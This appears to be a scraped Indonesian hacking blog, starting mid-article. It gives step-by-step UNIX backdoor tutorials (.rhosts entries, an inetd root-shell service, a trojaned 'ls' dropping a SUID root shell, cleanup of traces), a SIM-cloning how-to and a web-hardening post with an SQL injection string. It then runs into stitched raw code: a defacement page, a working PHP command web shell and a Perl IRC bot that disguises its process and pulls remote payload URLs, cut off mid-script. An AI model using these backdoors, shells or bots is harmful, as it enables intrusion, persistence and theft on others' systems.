lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel

mengenai scanning/probing di situs-situs hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti

eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain,

namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisa

bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan

file password ke alamat email tertentu.)

2. Backdoor

Seperti terjemahan harfiahnya, backdoor bisa dianggap ‘pintu masuk lewat

belakang’. Backdoor berfungsi untuk memberikan sang programmer akses ke

suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu

saja sang programer di sini bisa juga diartikan ‘sang penyusup’.

Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga

yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar

(baik hardware maupun software ) yang sengaja menempatkan backdoor tak

terdokumentasi untuk kemudahan ‘maintenance’ dan sejenisnya, dalam artikel

ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke

dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan

menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan

berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera

menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root.

Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan

harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu

atau lebih jalan masuk ‘alternatif’. Jelas, sebagian besar teknik-teknik

backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.

Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses

root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin

menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap

selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi

dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker,

kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa

sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif

dengan privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti

Backdoor di router-router, printserver, dll buatan 3Com), namun disini

akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem

UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan

melalui file /.rhosts:

korban# echo “indohack2.ri.go.id ganjaman” >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar

-dalam contoh diatas user ganjaman dari indohack2.ri.go.id – yang boleh

mengakses account tanpa password), dan untuk masuk kembali ke sistem dari

account “ganjaman” di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

poof! shell root tanpa password!

Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan

entri berikut dari file /etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas

sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh

UNIX sistem secara internal. Seringkali banyak diantara crackers yang

mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet

dengan nama login “bin” tidak memerlukan password. Tapi ingatlah bahwa

file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh

sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar

kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di

home directory milik bin. Kembali ke entri file password diatas, bisa kita

lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,

namun kita masih juga tidak bisa mendapatkan shell sebab account ‘bin’

dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah

ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau

/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren

kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa

keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah

entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau

string unik lainnya yang bukan merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan “in.rootd” (sebenernya

ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada

tuh yang namanya root daemon – tapi metode ini benar-benar cocok disebut

rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat

salah satu port yang didefinisikan dalam “inetd”:

root@korban# echo “ntcp 6969/tcp # Network Traffic Control Protocol” >>

/etc/services

root@korban# echo “ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r” >>

/etc/inetd.conf

root@korban# echo “echo indohack2.ri.go.id > ~root/.rhosts” > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem

yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga

perintah diatas:

1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor

port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024

sampai 65000-an), sedangkan “Network Traffic Control Protocol” adalah

karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya

sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r

setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya

mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan

mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan

perintah-perintah selayaknya kita login lewat jalur normal. Sang shell

akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita.

Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu

lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti

/tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang

baru saja kita luncurkan (id=0 – root!). Tentunya kamu bisa saja menulis

skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan

saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari

mesin host kita ke file .rhosts milik root.

Tentu jika sang admin memang keren kung funya, rlogind akan

dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu

periksa isi direktori dan file “history” milik root dan isinya menunjukkan

bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas

akan memberikan jalan masuk lewat belakang ke dalam sistem target (idih,

kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969,

sedangkan daemon inet di mesin korban akan menerima sambungan tersebut,

menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan

dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik

root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali

menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang

sysadmin mungkin akan curiga melihat skrip ‘asing’ dijalankan lewat port

6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

dan, BOOM!

korban#

shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar

ke indohack@hotmail.com, bertitel “Terimakasih, suhu Ganjaman dan

SuperCock, atas ilmu ngent… engin badannya …” ). Tapi ingatlah untuk

segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu

kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi

udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala

spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan

bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan

service-service yang jarang (hampir tidak pernah dipakai) seperti

utilitas-utilitas X, segala utilitas berkepala “r”, dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan

bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem

mempunyai program audit keamanan yang akan mensensus seluruh file berbit

SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi

homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu

program yang sudah berjalan / terinstal secara default, seperti xterm dan

splitvt, sehingga sebuah option rootshell akan secara otomatis

execv(“/bin/sh”, “sh”, NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel

kelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedang

berjalan untuk menerima perintah-perintah hasil karangan kamu sendiri.

Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah

berhasil memodifikasi program sendmail di server korban.com (PSM=Pukulan

Sinar Matahari):

212@GG> telnet korban.com 25

Trying mesin.korban.com …

Connected to mesin.korban.com.

Escape character is ‘^]’.

220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; … [snip] …

PSM_EXEC /bin/cp /bin/sh /tmp/elit

Done … master!

PSM_EXEC /bin/chmod 4755 /tmp/elit

Done … master!

Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan

segala kerendahan hati minta izin untuk berguru!

3 Trojan Horse

===============

Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya

Trojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatu

program atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya,

Trojan Horse adalah program yang mempunyai ‘feature’ gelap. Misalnya kamu

membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan

perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa

sehingga saat sang sysadmin menjalankan program tersebut, tanpa

disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang

hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyai

banyak peminat. Beberapa ‘lamers’ mendownload skrip tersebut tanpa

menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan

akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)

4 Trapdoor

===========

Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun

dalam artikel ini, ‘Trapdoor’ diasumsikan sebagai cara yang bisa kita

gunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita akses

root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang

paling gres, atau sebuah sistem dimana hampir semua eksploit untuk

mendapatkan root tidak berjalan sama sekali (patched systems). Jangan

putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang

sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu

sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan

password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak

ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.

Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa

mengelabui puluhan sysadmin diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir

milik user yang accountnya kamu ‘pinjam’):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu

mengganti privilesenya ke root jika beliau ingin memeriksa isi direktori

ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugas

untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan

sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem.

Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letak

kelemahan UNIX dibanding … uh, MS-DOS. Dalam UNIX, seorang sysadmin yang

baik selalu mengetik ‘full pathname’ dari program manapun yang dia

jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan

kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftar

search path. Jadi jika misalnya sang sysadmin melakukan:

root# pwd

/usr/home/staff/user1

root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan

dalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama

‘ls’? Heheheh … cukup menarik, khan. Nah, sekarang kita bisa buat sebuah

skrip yang berisi:

1. !/bin/sh

cp /bin/sh /tmp/vi-save-902887

chown root /tmp/vi-save-902887

chmod 4755 /tmp/vi-save-902887

rm ./ls

ls

simpan skrip tersebut di homedir user1, beri nama “ls” dan

user1@korban> chmod +x ls

sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk

mengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untuk

user2 di mesin yang sama, maka kamu bisa saja ‘mengundang’ sang admin.

Login sebagai user1, dan kirim imel

user1@korban> mail root@localhost

Subject: “Heheheh … Kena garap dari belakang!”

Hello sysadmin tolol! Mesin kamu sudah kebobolan!

ttd,

God of All Hackers, Virus Researchers and Lame Mailbombers,

Phardera

.

Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir

user1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmin

telah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karena

vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal

menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu

kemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh …

[+/-] Selengkapnya…

[+/-] Ringkasan…

Diposkan oleh adesurya-online.blogspot.com di 11:43 1 komentar Link ke posting ini

Minggu, 2008 Oktober 26
Kloning Nomor Handphone.

Kloning nomor handphone? Mungkin itu salah satu berita yang sangat hangat dibicarakan sekarang ini. Penyebab nya tak lain adalah adanya dugaan pembunuhan penegak HAM (alm. Munir) menggunakan sarana ini. Sebenarnya peng-kloningan nomor handphone tidak lah sesulit yang dibayangkan, ini sangat mungkin bisa dilakukan oleh siapapun. Jadi kalau sudah begitu, pertanyaannya yang muncul dibenak saudara mungkin bagaimanakah cara melakukannya? Baiklah saya akan sedikit sharing ilmu dengan rekan-rekan semuanya tentang cara pengkloningan nomor handphone.

Pengkloningan nomor handphone dapat dilakukan dengan 2 cara yaitu yang pertama dengan menerobos system jaringan operator dan melakukan pengkloningan nomor handphone dan yang kedua menggunakan software/alat yang diproduksi oleh Taiwan. Apakah anda pernah mengalami kehilangan SIM handphone? Lalu anda datang kepada pihak operator dan hanya bermodalkan KTP serta materai anda bisa mendapatkan nomor anda kembali dalam beberapa menit proses. Kira-kira seperti itu lah proses peng-kloningan SIM handphone. Dimana pihak operator dapat melakukan pengkloningan SIM semaunya. Tapi dalam artikel ini saya tidak akan membahas bagaimana caranya untuk menerobos system operator seluler dan melakukan peng-kloningan karena hal ini sangat melanggar kode etik hacker dan bisa meresahkan masyarakat. Pada kali ini saya akan menerangkan sedikit cara pengkloningan menggunakan alat/software.

Kira-kira 1 tahun yang lalu, sebuah alat canggih telah diciptakan oleh Taiwan yang berfungsi untuk mengkloning nomor telepon. Alat itu mempunyai nama Sim Max dan Sim Master 3. Jika anda ingin mempunyai alat ini anda tidak perlu susah untuk mencarinya karena alat ini sudah masuk ke indonesia dan anda dapat mendapatkannya dengan budget yang terbilang murah untuk ukuran alat secanggih ini. Alat ini dibanderol dengan harga 1,5 juta/bundle (sudah termasuk alat dan Software). Bundle-an ini berisi master card sim yang kosong sebanyak 12 buah dan satu buah cd software.

Proses nya pun tidak terlalu sulit. Apakah anda pernah melakukan transfer data dari satu disket ke disket lainnya menggunakan komputer? Mirip begitulah proses peng-kloningannya. Proses ini menggunakan prinsip kerja reader SIM meng-copy ke komputer lalu kompputer meng-copy balik ke sim card yang masih kosong. Hanya dalam beberapa jam anda dapat melakukannya dengan sukses.

Untuk lebih jelasnya saya akan menjelaskan step by step untuk melakukannya :
Pertama-tama anda hubungan sim card reader itu ke computer. Lalu masukkan sim card induk atau yang ingin di cloning ke dalam sim card reader dan masukan CD yang disertakan, lalu software akan otomatis melakukan back-up data, seluruh data yang berada di sim akan pindah untuk sementara ke dalam hardisk komputer kita. Setelah itu masukkan sim card yang kosong dan ikuti langkah yang disediakan oleh SIM MAX, proses ini akan memakan waktu kira-kira 5 jam dan setelah itu sim card yang kosong tadi sudah bisa digunakan layaknya SIM asli dari operator seluler. Walaupun anda sudah berhasil meng-kloning SIM menjadi dua, anda hanya bisa menggunakan satu SIM saja, yaitu sim kosong yang baru saja anda gunakan untuk meng-copy tadi ini dikarenakan sewaktu register di network, operator sudah memblock network untuk SIM lama dikarenakan sudah tergolong expired..

Mungkin itu adalah step by step untuk melakukan peng-kloningan SIM handphone, jadi tidak ada alasan bagi terdakwa di pengadilan kasus HAM (Alm. Munir) untuk mengelak jika memang terbukti melakukan peng-kloningan nomor handphone, karena pada zaman sekarang tidak ada yang mustahil dilakukan menggunakan IT. Penulis menyadari mungkin artikel ini dikemudian hari akan menimbulkan dampak yang negatif, tapi penulis tidak bertanggung jawab atas dipublikasikannya artikel ini jika disuatu hari terjadi kejahatan terhadap aksi peng-kloningan nomor handphone itu sendiri. Itu tergantung respon dari rekan-rekan sendiri. Jika rekan-rekan mengganggap diri rekan-rekan adalah hacker sejati, mari kita sama-sama menjunjung tinggi sikap privacy orang dan seperti biasa tugas kita hanya untuk mencari kelemahan dan memberitahukannya kepada pihak yang berwajib bukan kita yang beraksi untuk mengacaukan keadaan.

[+/-] Selengkapnya…

[+/-] Ringkasan…

Diposkan oleh adesurya-online.blogspot.com di 12:23 2 komentar Link ke posting ini

Rabu, 2008 April 09
Pengamanan Web Server Dan Site (Versi SQL Injection, JS, XSS, CSS)

Percaya atau tidak kalau mengamankan web itu lebih sulit daripada merusak tampilan atau merusak database dari web tersebut.
Maraknya deface dan hacking yg dilakukan oleh beberapa orang yg dikarenakan kesalahan konfigurasi system atau kurangnya pengetahuan webmaster masih sering dilakukan.

1. Pencegahan SQL Injection, contoh sintak SQL Injection :

?or 1=1–

Penyerangan melalui teknik ini sama artinya dng penyerangan terhadap database. Untuk melakukan pencegahan terhadap SQL Injection ini, pertama seperti kita ketahui karakter ( ? ), (–), (NULL), (\x00), (\n), (\r), (?), (/), (/x1a) merupakan biang masalah dari SQL ini, tips nya yaitu escape semua special karakter tersebut untuk php/mysql: mysql_real_escape_string. Atau dengan cara kedua yaitu filter semua karakter yang masuk dan hanya mengijinkan karakter ttt yg dpt di inputkan. Yg perlu diingat, Sql injection ini tidak hanya bisa masuk melalui inputan dari user tetapi juga bisa melalui URL dengan bantuan karakter ( ; ) yang arti dari karakter itu adalah ?baris dibelakang ; akan ikut di eksekusi?. Disarankan, abaikan semua karakter setelah alamat URL. Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

2. Pencegahan XSS (Cross Side Scripting), contoh script XSS :

Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal…..! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.

3. Pemasukkan Tag HTML. Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars). Contoh script :

function cleanup($value=”", $preserve=”", $tag=”") {
if (empty($preserve)) {
$value=strip_tags($value, $allowed_tags);
}
$value=htmlspecialchars($value);
return $value;
}

4. Batasi penggunaan Java Script dan jangan menggunakan java script untuk membuat sesuatu yang akan meyangkut hidup matinya web anda, karena java script bersifat client dan membuat akses yang akan sangat lambat. Disarankan gunakan aplikasi yang lain seperti PHP dan ASP karena sudah bersifat server.

5. Penyimpanan file database sebaiknya disimpan dlm directory private. Jangan pernah menyimpannya di directory public yang memungkinkan orang lain dapat mengaksesnya. Tapi biasanya di web hosting sudah menyediakan direktori khusus untuk database. Dalam keamanan database harus dilindungi dengan password. Koneksi sebaiknya di enkripsi dengan SSL. Data yang penting jangan disimpan secara langsung melainkan sebagai hash (md5) atau modifikasi dari md5 yaitu SHA-256 dan SHA-512 atau terenkripsi dengan bahasa pemrograman lain misalnya PHP.

6. Berhati hatilah memilih webhosting, itu sudah kami buktikan. Sehebat apapun web yang dibuat walaupun pengecekan password dibuat 2 kali dan di encrypt berapa kalipun kalau sudah server yang diserang kita tidak bisa berbuat apa apa.

Thx To  Ade Surya Iskandar The Hacking Inspiration

<title>Estrada</title>

</head>

<body>
<script language=”JavaScript”>
<!– Begin
var months=new Array(13);
months[1]=”January”;
months[2]=”February”;
months[3]=”March”;
months[4]=”April”;
months[5]=”May”;
months[6]=”June”;
months[7]=”July”;
months[8]=”August”;
months[9]=”September”;
months[10]=”October”;
months[11]=”November”;
months[12]=”December”;
var time=new Date();
var lmonth=months[time.getMonth() + 1];
var date=time.getDate();
var year=time.getYear();
if (year < 2000)    // Y2K Fix, Isaac Powell
year = year + 1900;
document.write(“<center>” + lmonth + ” “);
document.write(date + “, ” + year + “</center>”);
// End –>
</script>
</center>

<html>

<head>
<meta http-equiv=”Content-Language” content=”en-us”>
<meta name=”GENERATOR” content=”Microsoft FrontPage 5.0″>
<meta name=”ProgId” content=”FrontPage.Editor.Document”>
<meta http-equiv=”Content-Type” content=”text/html; charset=windows-1252″>
<title>-=|fuck|=-</title>
</head>

<body text=”#FFFFFF” bgcolor=”#000000″>

<p align=”center”><b><font face=”Algerian” size=”7″>HaCKeD By Estrada</font></b></p>
<p align=”center”>&nbsp;</p>
<center><img src=”http://www.coolgifs.de/gifs/skelette/mail.gif” alt=”sOlo TecHnoLoGy”></center><br /><br />
</body>

</html>

<?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == “”) $chdir = getcwd( );
if(!$whoami)$whoami=exec(“whoami”);
?>
<br>
<TABLE BORDER=”0″ CELLPADDING=”0″ CELLSPACING=”0″>
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Current Path:</b> <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo “Yes”; }else{ echo “No”; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Server Services:</b> <?= “$SERVER_SOFTWARE $SERVER_VERSION”; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Server Adress:</b> <?= “$SERVER_ADDR $SERVER_NAME”; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>Script Current User:</b> <?= $user ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE=”font-family: verdana; font-size: 10px;”><b>PHP Version:</b> <?= $ver ?></DIV></TD>
</TR>
</TABLE>
<BR>
<font face=”courier new” size=”2″ color=”777777″>
<b>#</b>D-3-D php : <br>
<FORM name=injection METHOD=POST ACTION=”<?php echo $_SERVER["REQUEST_URI"];?>”>
cmd :
<INPUT TYPE=”text” NAME=”cmd” value=”<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>” size=”161″>
<br>
<INPUT TYPE=”submit”>
</FORM>
<hr color=777777 width=100% height=115px>
</font>
<pre>
<?
$cmd = $_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
system(“$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “&gt;”, str_replace(“<”, “&lt;”, $output));
?>
</pre>
<hr color=777777 width=100% height=115px>
<font face=”courier new” size=”2″ color=”777777″>
<p align=”center”><b><font face=”Algerian” size=”7″>.:sOlo TecHnoLoGy Corps:.</U></b></marquee>
</font>
</body>
</div>

$process   = “/usr/local/apache2/bin/httpd -DSSL”;
my $printcmd  = “http://www.kuiwa.at/spider.txt?”;
my $id        = “http://www.kuiwa.at/tikam.txt?”;
my $spread    = “http://geocities.com/ina_lidya/spreads.txt?”;
my $bot       = “http://www.kuiwa.at/bot.txt?”;
my $bin       = “http://cause-i-can.com/readme.txt?”;
my $ircserver = “irc.byroe.net”;
my $start     = “!solo”;
my $port      = “6666″;
my $nickname  = “Solo” . int( rand(9) ). “”;
my $admin     = “Estrada”; ## put here ur nickname, so u can find all the results in pvt
my $channel   = “#soloteam”; ## the normal chan to scan, and see the results too
my $chanres   = “#bot”; ## the channel where u can find all the results of the bot
my $verz      = “Soloteam Scanner Technology”;

print “\n”;
print “  Soloteam Scanner Technology\n”;
print “  Author: noname\n”;
print “  Release $verz\n”;
print “  Server $ircserver:$port\n”;
print “  $channel and $chanres\n”;
print “  Enjoy \n\n”;

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;

my $pid = fork;
exit if $pid;
$0 = “$process” . “” x 16;
my $dsp = IO::Socket::INET->new(
PeerAddr => “$ircserver”,
PeerPort => “$port”,
Proto    => “tcp”
) or die “Can not connect on server!\n”;
$dsp->autoflush(1);
print $dsp “NICK $nickname\r\n”;
print $dsp “USER usil 8 *  : Usil \r\n”;
print $dsp “JOIN $channel\r\n”;
print $dsp “PRIVMSG $channel :1Soloteam Scanner!! \r\n”;
print $dsp “PRIVMSG $channel :1Scan Command Is:4 !scan bug dork 1& 5!google bug dork \r\n”;
print $dsp “PRIVMSG $channel :7Soloteam Scanner powered By Team sOlTecH CoMmUniTy \r\n”;
sleep(1);
print $dsp “NICK $nickname\r\n”;
print $dsp “USER jahil 8 *  : Usil \r\n”;
print $dsp “JOIN $chanres\r\n”;
print $dsp “PRIVMSG $chanres :7Welcome 1:4) \r\n”;
print $dsp “PRIVMSG $chanres :7Soloteam Scanner Powered By Team sOlTecH CoMmUniTy \r\n”;

while ( $line = <$dsp> ) {

$line =~ s/\r\n$//;
if ( $line =~ /^PING \:(.*)/ ) {
print “PONG :$1″;
print $dsp “PONG :$1″;
}

if ( $line =~ /PRIVMSG $channel :!help/ ) {
sleep(1);
display( $dsp,”PRIVMSG $channel :10HELP:”);
display( $dsp,”PRIVMSG $channel :5[Help]10 Scan Command Is:4 !scan bug dork 10&4 !google bug dork”);
display( $dsp,”PRIVMSG $channel :5[Help]10 For Info Type: 7!info”);
}

if ( $line =~ /PRIVMSG $channel :!info/ ) {
my $sysos  = `uname -sr`;
my $uptime = `uptime`;
if ( $sysos =~ /freebsd/i ) {
$sysname = `hostname`;
$memory = `expr \`cat /var/run/dmesg.boot | grep “real memory” | cut -f5 -d” “\` \/ 1048576`;
$swap = `$toploc | grep -i swap | cut -f2 -d” ” | cut -f1 -d”M”`;
chomp($memory);
chomp($swap);
}

elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
$memory  = `free -m |grep -i mem | awk ‘{print \$2}’`;
$swap    = `free -m |grep -i swap | awk ‘{print \$2}’`;
chomp($swap);
chomp($memory);
}
else {
$sysname = “No Found”;
$memory  = “No found”;
$swap    = “No Found”;
}
$uptime  =~ s/\n//g;
$sysname =~ s/\n//g;
$sysos   =~ s/\n//g;
sleep(1);
display( $dsp,”PRIVMSG $channel :10Information:” );
display( $dsp,”PRIVMSG $channel :5-10 Server:14 $ircserver 10Port:14 $port” );
display( $dsp,”PRIVMSG $channel :5-10 Software:14 $sysos” );
display( $dsp,”PRIVMSG $channel :5-10 Process/Pid:14 $process” );
display( $dsp,”PRIVMSG $channel :5-10 Uptime:14 $uptime” );
display( $dsp,”PRIVMSG $channel :5-10 Memory:14 $memory 10Swap:14 $swap” );
display( $dsp,”PRIVMSG $channel :5-10 Creator:7 Team sOlTecH CoMmUniTy” );
display( $dsp,”PRIVMSG $channel :5-10 Version:7 $verz” );
}

if ( $line =~ /PRIVMSG $channel :!id/ )
{

1. # Copyright © Script made by Team Soloteam indoIRC . Don’t remove this comment !

my $testid = $id;
my $req    = HTTP::Request->new( GET => $testid );
my $ua     = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /<\?php/ ) {
sleep(1);
display( $dsp,”PRIVMSG $channel :5[Info]3 The ID Is Work” );
}
}
else {
sleep(1);
display( $dsp,”PRIVMSG $channel :5[Info]4 ID Is Not Work.” );
display( $dsp,”PRIVMSG $channel :5[Info]4 Modify The ID.” );
display( $dsp,”PRIVMSG $channel :5[Info]4 The Scanner Will Be Quited.” );
display( $dsp,”PRIVMSG $channel :4[WARNING]12 Scanner Quited.” );
sleep(2);
display( $dsp,”PRIVMSG $channel :4[WARNING]12 Bye Bye” );
display( $dsp,”QUIT” );
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
